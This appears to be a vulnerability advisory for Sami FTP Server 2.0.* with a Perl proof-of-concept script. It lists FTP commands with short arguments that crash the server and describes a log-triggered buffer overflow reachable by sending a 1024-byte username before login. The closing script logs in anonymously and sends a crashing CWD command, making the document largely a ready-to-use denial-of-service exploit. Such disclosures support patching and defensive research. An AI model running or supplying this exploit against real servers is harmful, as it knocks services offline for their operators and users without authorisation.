###################################################################################################################
Sami FTP Server 2.0.* Multiple Remote Vulnerabilities
Bugs :
1)Multiples remote denial of service (CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)
2)Remote Buffer overflow (Logs)
Remote Denial of service:
APPE A => server gone
CWD AA => server gone
DELE AA ==> server gone
MKD AA ==> server gone
RMD AA ==> server gone
RETR AA ==> server gone
RNFR AA ==> server gone
RNTO AA ==> server gone
SIZE AA ==> server gone
STOR AA ==> server gone
Buffer Overflow :
In the console management,you can view your logs,and set some stuff,when you open the console management a
buffer overflow occurs ,if you have send previously a request(no matter the command) with 1024 bytes to the server.
Also explorer.exe crash at the same time, 2 in 1 ;] The file is called(SamyFtp.binlog)note that this bug is
quite critical , because it will occurs all the time,when you open the console management,and you dont need to be loggued
you can simply send a username with 1024 bytes β¦
@nolife: Life is always better when you dont know. things are clearer also smile
Denial of service Poc
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$targetβ¦\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;